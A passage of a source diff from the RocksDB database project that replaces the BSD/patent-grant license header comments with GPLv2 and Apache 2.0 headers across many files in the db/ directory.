+1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/compaction_iteration_stats.h b/db/compaction_iteration_stats.h index 2725b4b33df..52a666e4e21 100644 --- a/db/compaction_iteration_stats.h +++ b/db/compaction_iteration_stats.h @@ -1,9 +1,7 @@ // Copyright (c) 2016-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/db/compaction_iterator.cc b/db/compaction_iterator.cc index a89d16fccd8..c59e734ca26 100644 --- a/db/compaction_iterator.cc +++ b/db/compaction_iterator.cc @@ -1,11 +1,9 @@ // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "db/compaction_iterator.h" #include "rocksdb/listener.h" diff --git a/db/compaction_iterator.h b/db/compaction_iterator.h index 10f13fd139d..54c4bc249c8 100644 --- a/db/compaction_iterator.h +++ b/db/compaction_iterator.h @@ -1,11 +1,9 @@ // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/db/compaction_iterator_test.cc b/db/compaction_iterator_test.cc index 3f2ad6e4ed7..b625c99ffaa 100644 --- a/db/compaction_iterator_test.cc +++ b/db/compaction_iterator_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "db/compaction_iterator.h" diff --git a/db/compaction_job.cc b/db/compaction_job.cc index 407671e85a1..636cdbea183 100644 --- a/db/compaction_job.cc +++ b/db/compaction_job.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/compaction_job.h b/db/compaction_job.h index c230584917c..6ca5d627a75 100644 --- a/db/compaction_job.h +++ b/db/compaction_job.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/compaction_job_stats_test.cc b/db/compaction_job_stats_test.cc index dc2fc0fef62..9a8372f5785 100644 --- a/db/compaction_job_stats_test.cc +++ b/db/compaction_job_stats_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/compaction_job_test.cc b/db/compaction_job_test.cc index 102401364fb..cace1814ad8 100644 --- a/db/compaction_job_test.cc +++ b/db/compaction_job_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/db/compaction_picker.cc b/db/compaction_picker.cc index fc6a8a8da86..6795227b5c9 100644 --- a/db/compaction_picker.cc +++ b/db/compaction_picker.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/compaction_picker.h b/db/compaction_picker.h index eb5f06819b6..f44139c2dd9 100644 --- a/db/compaction_picker.h +++ b/db/compaction_picker.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/compaction_picker_test.cc b/db/compaction_picker_test.cc index 5fb3db0a9e8..2e34e9ab277 100644 --- a/db/compaction_picker_test.cc +++ b/db/compaction_picker_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "db/compaction_picker.h" #include diff --git a/db/compaction_picker_universal.cc b/db/compaction_picker_universal.cc index 91ed40586de..ce480267c44 100644 --- a/db/compaction_picker_universal.cc +++ b/db/compaction_picker_universal.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/compaction_picker_universal.h b/db/compaction_picker_universal.h index cbd2e871f26..3f2bed3e621 100644 --- a/db/compaction_picker_universal.h +++ b/db/compaction_picker_universal.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/comparator_db_test.cc b/db/comparator_db_test.cc index 878acd0d5a4..8ba800f22f9 100644 --- a/db/comparator_db_test.cc +++ b/db/comparator_db_test.cc @@ -1,11 +1,9 @@ // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include diff --git a/db/convenience.cc b/db/convenience.cc index a2ce8893e0d..cc5d9524839 100644 --- a/db/convenience.cc +++ b/db/convenience.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2012 Facebook. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/corruption_test.cc b/db/corruption_test.cc index f0bc3fdf3e8..f9ab8302c0a 100644 --- a/db/corruption_test.cc +++ b/db/corruption_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/cuckoo_table_db_test.cc b/db/cuckoo_table_db_test.cc index 57e75aa1c8d..e7c2d279a4d 100644 --- a/db/cuckoo_table_db_test.cc +++ b/db/cuckoo_table_db_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/db/db_basic_test.cc b/db/db_basic_test.cc index 5427a08f57d..3d732f573ad 100644 --- a/db/db_basic_test.cc +++ b/db/db_basic_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_block_cache_test.cc b/db/db_block_cache_test.cc index 5eaf6793277..317597cb637 100644 --- a/db/db_block_cache_test.cc +++ b/db/db_block_cache_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_bloom_filter_test.cc b/db/db_bloom_filter_test.cc index 5d267776fa4..e6248a04014 100644 --- a/db/db_bloom_filter_test.cc +++ b/db/db_bloom_filter_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_compaction_filter_test.cc b/db/db_compaction_filter_test.cc index a2534d259d0..9f751f059fa 100644 --- a/db/db_compaction_filter_test.cc +++ b/db/db_compaction_filter_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_compaction_test.cc b/db/db_compaction_test.cc index f48942939f2..4c7da8d1b50 100644 --- a/db/db_compaction_test.cc +++ b/db/db_compaction_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_dynamic_level_test.cc b/db/db_dynamic_level_test.cc index ec7a40aa1d1..f968e7fc057 100644 --- a/db/db_dynamic_level_test.cc +++ b/db/db_dynamic_level_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_encryption_test.cc b/db/db_encryption_test.cc index 49c432f390d..38eee56459e 100644 --- a/db/db_encryption_test.cc +++ b/db/db_encryption_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include "db/db_test_util.h" #include "port/stack_trace.h" diff --git a/db/db_filesnapshot.cc b/db/db_filesnapshot.cc index 97a9e8bbe6f..24ddd4af4ef 100644 --- a/db/db_filesnapshot.cc +++ b/db/db_filesnapshot.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2012 Facebook. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_flush_test.cc b/db/db_flush_test.cc index 1cd26b59a0d..107e82467cb 100644 --- a/db/db_flush_test.cc +++ b/db/db_flush_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_impl.cc b/db/db_impl.cc index 06b5e09ef51..f770b51ae7f 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_impl.h b/db/db_impl.h index 22ce36fd352..bc2072d7e96 100644 --- a/db/db_impl.h +++ b/db/db_impl.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_impl_compaction_flush.cc b/db/db_impl_compaction_flush.cc index dac9f2c93d4..68d2831233b 100644 --- a/db/db_impl_compaction_flush.cc +++ b/db/db_impl_compaction_flush.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_impl_debug.cc b/db/db_impl_debug.cc index 81462a61ee7..9f4fccabc42 100644 --- a/db/db_impl_debug.cc +++ b/db/db_impl_debug.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_impl_experimental.cc b/db/db_impl_experimental.cc index 08213dfd169..0d010758e6e 100644 --- a/db/db_impl_experimental.cc +++ b/db/db_impl_experimental.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_impl_files.cc b/db/db_impl_files.cc index d34f4640220..3bbf94c293b 100644 --- a/db/db_impl_files.cc +++ b/db/db_impl_files.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_impl_open.cc b/db/db_impl_open.cc index e8d8c91066f..bc94b6095f1 100644 --- a/db/db_impl_open.cc +++ b/db/db_impl_open.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_impl_readonly.cc b/db/db_impl_readonly.cc index cc209a91254..d4fe7e702f8 100644 --- a/db/db_impl_readonly.cc +++ b/db/db_impl_readonly.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "db/db_impl_readonly.h" diff --git a/db/db_impl_readonly.h b/db/db_impl_readonly.h index 0cc393d1286..9bdc95cc874 100644 --- a/db/db_impl_readonly.h +++ b/db/db_impl_readonly.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/db/db_impl_write.cc b/db/db_impl_write.cc index 4dfef1bad82..f52bce611a9 100644 --- a/db/db_impl_write.cc +++ b/db/db_impl_write.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_info_dumper.cc b/db/db_info_dumper.cc index c618ec4c67e..1668a1638ff 100644 --- a/db/db_info_dumper.cc +++ b/db/db_info_dumper.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef __STDC_FORMAT_MACROS #define __STDC_FORMAT_MACROS diff --git a/db/db_info_dumper.h b/db/db_info_dumper.h index 95f8b4aed27..acff8f1b8f6 100644 --- a/db/db_info_dumper.h +++ b/db/db_info_dumper.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/db/db_inplace_update_test.cc b/db/db_inplace_update_test.cc index f626488503c..c1f1b51e301 100644 --- a/db/db_inplace_update_test.cc +++ b/db/db_inplace_update_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_io_failure_test.cc b/db/db_io_failure_test.cc index 9c42856ff37..e93961c13d0 100644 --- a/db/db_io_failure_test.cc +++ b/db/db_io_failure_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_iter.cc b/db/db_iter.cc index a64a355e785..7a22f573f30 100644 --- a/db/db_iter.cc +++ b/db/db_iter.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_iter.h b/db/db_iter.h index ba5f7205e22..83352644059 100644 --- a/db/db_iter.h +++ b/db/db_iter.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/db_iter_test.cc 